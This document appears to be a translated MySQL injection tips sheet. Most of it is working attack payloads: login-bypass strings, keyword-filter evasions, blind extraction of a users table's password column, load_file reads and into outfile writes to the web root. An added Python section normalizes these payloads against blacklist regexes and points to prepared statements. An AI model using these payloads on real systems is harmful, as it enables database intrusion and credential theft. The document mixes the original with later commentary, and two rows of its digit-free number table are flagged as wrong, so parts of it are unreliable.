MySQL INJECTION SKILLS
0x00 Introduction
See also the MySQL injection primer at http://drops.wooyun.org/tips/123
Much of the material overlaps, but some of the tips below are genuinely useful.
All of the following tips apply only to MySQL, because its syntax is unusually flexible.
0x01 MySQL's flexible syntax
1. MySQL syntax and Authentication Bypass
Comment symbols:
#
-- X       (X is any character)
/*         (MySQL-5.1)
;%00
'or 1=1;%00
'or 1=1 union select 1,2'
'or 1=1#
'/*!50000or*/1=1 -- -    // the number inside the executable comment must be lower than the server version, e.g. below 50138 on MySQL 5.1.38
'/*!or*/1=1 -- -
Prefix operators:
Arbitrary mixes of + - ~ !
'or --+2=- -!!!'2
Testing shows that and/or can be followed by an even number of ! or ~ characters, which can replace the space or be mixed together (the rules differ once they are mixed). The space before and/or can be omitted.
'or- -!!!1=1;
Operators:
^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, >=, <=, <>, <=>, XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
'or 1 rlike '1
Space replacements: %20, %09, %0a, %0b, %0c, %0d, %a0
Parentheses, prefix operators, operators and quotation marks can also be inserted in place of spaces.
'or+(1)sounds/**/like"1"--%a0-
String formats:
'or "a"='a
'or 'a'=n'a'          // national character set (unicode)
'or 'a'=b'1100001'    // binary
'or 'a'=_binary'200'  // did not work when tested on 5.5.41
'or 'a'=x'61'         // hexadecimal
2. Some commonly used MySQL building blocks
Constants: true, false, null, \N, current_timestamp, ...
User variables: @myvar:=1
System variables: @@version, @@datadir, ...
Common functions: version(), pi(), pow(), char(), substring(), ...
3. MySQL type conversion
'or 1=true#                                  // true=1, false=0
'or 1#                                       // true
'or version()=5.5#                           // 5.5.41-log
'or round(pi(),1)+true+true+0.4=version()#   // 3.1+1+1+0.4
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users
The preceding statements all have the same effect.
4. Authentication Bypass
Bypass string: '='
select data from users where name=''=''
select data from users where false=''
select data from users where 0=0
Bypass string: '-'
select data from users where name=''-''
select data from users where name=0-0
select data from users where 0=0
0x02 Keyword filtering
Space
Filter: /\s/
%20, %09, %0a, %0b, %0c, %0d, %a0
Keywords: OR, AND
Filter: /\sor\s/i, /\sand\s/i
'||1='1    // or
'&&1='1    // and
Keywords: union select
Filter: /union\s+select/i
'and(true)like(false)union(select(pass)from(users))#
'union [all|distinct] select pass from users#
'union%a0select pass from users#
'union/*!select*/pass from users#
/vuln.php?id=1 union/*&sort=*/select pass from users -- -
If union itself is filtered, use blind injection to extract the data:
'and(select pass from users limit 1)='secret
The subquery returns a single value, which is then compared.
Keyword: limit
Filter: /limit/i
'and(select pass from users where id=1)='a
'and(select pass from users group by id having id=1)='a
'and length((select pass from users having substr(pass,1,1)='a'))
Keyword: having
Filter: /having/i
'and(select substr(group_concat(pass),1,1)from users)='a
Keywords: select ... from
Filter: /SELECT\s+[A-Za-z.]+\s+FROM/i
select [all|distinct] pass from users
select `table_name` from `information_schema`.`tables`
select pass as alias from users
select pass aliasalias from users
select pass `alias alias` from users
select+pass%a0from(users)
Keyword: select
Filter: /select/i
1. With file-read permission:
'and substr(load_file('file'),locate('documentroot',load_file('file'))+length('documentroot'),10)='a
'=''into outfile'/var/www/dump.txt
2. Get the column name:
'and <column name> is not null#
'procedure analyse()#
Then extract the value with substr:
'and substr(pass,1,1)='a
Keywords: select, and, &
'-0#
select data from users where name=''-0#   // int typecast
select data from users where name=0#      // int typecast
select data from users where 0=0#         // true
'-1#
select data from users where 0=-1#        // false
Use a conditional to select true or false: ifnull(), nullif(), case when, if()
'-if(name='admin',1,0)#
Or nest the conditions:
'-if(
    if(name='admin',1,0),            // condition
    if(substr(pass,1,1)='a',1,0),    // if true
    0                                // if false
)#
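The following is an added example, not code from the original page or from the wooyun primer it cites. It is a Python normalizer that undoes the evasions catalogued in 0x01 and 0x02 (executable and ordinary comments, the alternative whitespace bytes, || and && standing in for or/and, runs of prefix operators, parentheses used as separators) before any keyword matching, and compares the result with the page's own blacklist regexes on the page's payloads. The sample inputs, the NAIVE_FILTERS table (the page's patterns compiled with re.ASCII, an assumption that mimics a byte-oriented PCRE \s which does not match 0xA0) and the suspicious() classifier are all constructed for illustration.

```python
import re
from urllib.parse import unquote

# Bytes MySQL treats as whitespace; the page lists them URL-encoded as
# %20 %09 %0a %0b %0c %0d %a0.
MYSQL_WS = "\x20\x09\x0a\x0b\x0c\x0d\xa0"

# The blacklist patterns quoted in 0x02. re.ASCII restricts \s to ASCII
# whitespace, as a non-UTF PCRE would, so 0xA0 is not a match (an assumption
# about the regex engine behind the original filter).
NAIVE_FILTERS = {
    "or":           re.compile(r"\sor\s", re.I | re.ASCII),
    "and":          re.compile(r"\sand\s", re.I | re.ASCII),
    "union_select": re.compile(r"union\s+select", re.I | re.ASCII),
    "select_from":  re.compile(r"select\s+[A-Za-z.]+\s+from", re.I | re.ASCII),
}


def naive_match(raw: str) -> set:
    """Names of the blacklist patterns that fire on the raw, undecoded input."""
    return {name for name, rx in NAIVE_FILTERS.items() if rx.search(raw)}


def normalize(raw: str) -> str:
    """Rewrite a query fragment into the token stream MySQL will actually parse."""
    # latin-1 so that %a0 decodes to the single byte 0xA0 instead of U+FFFD.
    s = unquote(raw, encoding="latin-1")
    # /*!50000 ... */ is executed when the server version is high enough:
    # keep the body, drop the markers and the version number.
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    # An ordinary /* ... */ comment is skipped by the parser: it is a separator.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # Operator spellings of the boolean keywords.
    s = s.replace("||", " or ").replace("&&", " and ")
    # Quotes, parentheses and runs of prefix operators (+ - ~ !) also separate
    # tokens, so 'or--+2 and union(select(pass)from(users)) split into words.
    s = re.sub(r"([\"'`()]|[+\-~!]+)", r" \1 ", s)
    # Collapse every MySQL whitespace byte to one ASCII space.
    s = re.sub("[" + MYSQL_WS + "]+", " ", s)
    return s.strip().lower()


def suspicious(raw: str) -> set:
    """Injection structures visible after normalization (a coarse classifier)."""
    toks = set(normalize(raw).split())
    hits = set()
    if toks & {"or", "and"}:
        hits.add("boolean")
    if {"union", "select"} <= toks:
        hits.add("union_select")
    if {"select", "from"} <= toks:
        hits.add("select_from")
    return hits


# Constructed inputs: the page's bypass payloads plus two benign strings that
# show a keyword blacklist also misfires on ordinary English.
SAMPLES = [
    "'||1='1",
    "'/*!50000or*/1=1 -- -",
    "'or--+2=- -!!!'2",
    "'union%a0select pass from users#",
    "'union/*!select*/pass from users#",
    "'and(true)like(false)union(select(pass)from(users))#",
    "/vuln.php?id=1 union/*&sort=*/select pass from users -- -",
    "O'Reilly",
    "bread and butter",
]


def compare(samples=SAMPLES):
    """(input, blacklist hits, hits after normalization) for each sample."""
    return [(s, sorted(naive_match(s)), sorted(suspicious(s))) for s in samples]


if __name__ == "__main__":
    for raw, before, after in compare():
        print(f"{raw!r:62} blacklist={before} normalized={after}")
```

Running it shows every payload from 0x02 slipping past the raw regexes while the normalized token stream exposes the or/and, union select and select ... from structure; it also shows the benign "bread and butter" tripping the blacklist, which is the other half of why keyword filters are a poor control. Normalization narrows the gap but never closes it, so the real fix is to keep user input out of the SQL grammar with prepared statements: in PyMySQL or mysql-connector, cursor.execute("SELECT data FROM users WHERE name = %s", (name,)) sends each payload above as a plain string value.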
0x03 Function filtering
String-related functions: unhex, char, hex, ascii, ord, substr, substring, mid, pad (lpad/rpad), left, right, insert
'and substr(data,1,1)='a'#
'and substr(data,1,1)=0x61#          // 0x6162 for two characters
'and substr(data,1,1)=unhex(61)#     // unhex()
'and substr(data,1,1)=char(97)#      // char()
'and hex(substr(data,1,1))=61#
'and ascii(substr(data,1,1))=97#
'and ord(substr(data,1,1))=97#
Use conv() for base conversion:
'and substr(data,1,1)=lower(conv(10,10,36))#   // 'a'
'and substr(data,1,1)=lower(conv(11,10,36))#   // 'b'
'and substr(data,1,1)=lower(conv(35,10,36))#   // 'z'
Use functions to guess the data:
' and substr(data,1,1)='a'#
' and substring(data,1,1)='a'#
' and mid(data,1,1)='a'#
Without using commas:
' and substr(data from 1 for 1)='a'#
Rarer functions can also be tried to bypass filters:
lpad(data,1,space(1))                 // lpad('hi',4,'?') = '??hi'
rpad(data,1,space(1))                 // rpad('hi',4,'?') = 'hi??'
left(data,1)
reverse(right(reverse(data),1))
insert(insert(version(),1,0,space(0)),2,222,space(0))
Some functions offer search and match capabilities that work just as well:
'-if(locate('f',data),1,0)#
'-if(locate('fo',data),1,0)#
'-if(locate('foo',data),1,0)#
instr(), position()
Use functions to cut strings:
length(trim(leading 'a' from data))    // the length gets shorter
length(replace(data,'a',''))           // the length gets shorter
Both methods have the same effect.
0x04 The main ingredients used during injection
1. Control-flow operations (select, case, if(), ...)
2. Comparison operations (=, like, mod(), ...)
3. String extraction (mid(), left(), rpad(), ...)
4. String generation (0x61, hex(), conv())
Use conv([10-36],10,36) to produce every letter.
The table below builds the numbers 0-29 without a single digit character, from true/false, pi() and version(); the right-hand column is the letter that conv(n,10,36) turns each n into. The values assume version() casts to 5.1 (as on the 5.1.38 server mentioned in 0x01); on other versions the cells that use version() change. The expressions listed for 12 and 21 are as they appear on the page and do not evaluate to those values; the rest check out.
false, !pi()                          0
true, !!pi()                          1
true+true                             2
floor(pi())                           3
ceil(pi())                            4
floor(version())                      5
ceil(version())                       6
ceil(pi()+pi())                       7
floor(version()+pi())                 8
floor(pi()*pi())                      9
ceil(pi()*pi())                       10  A
ceil(pi()*pi())+true                  11  B
ceil(pi()+version())                  12  C
floor(pi()*pi()+pi())                 13  D
ceil(pi()*pi()+pi())                  14  E
ceil(pi()*pi()+version())             15  F
floor(pi()*version())                 16  G
ceil(pi()*version())                  17  H
ceil(pi()*version())+true             18  I
floor((pi()+pi())*pi())               19  J
ceil((pi()+pi())*pi())                20  K
ceil(pi()*version())                  21  L
ceil(pi()*ceil(pi()+pi()))            22  M
ceil((pi()+ceil(pi()))*pi())          23  N
ceil(pi())*ceil(version())            24  O
floor(pi()*(version()+pi()))          25  P
floor(version()*version())            26  Q
ceil(version()*version())             27  R
ceil(pi()*pi()*pi()-pi())             28  S
floor(pi()*pi()*floor(pi()))          29  T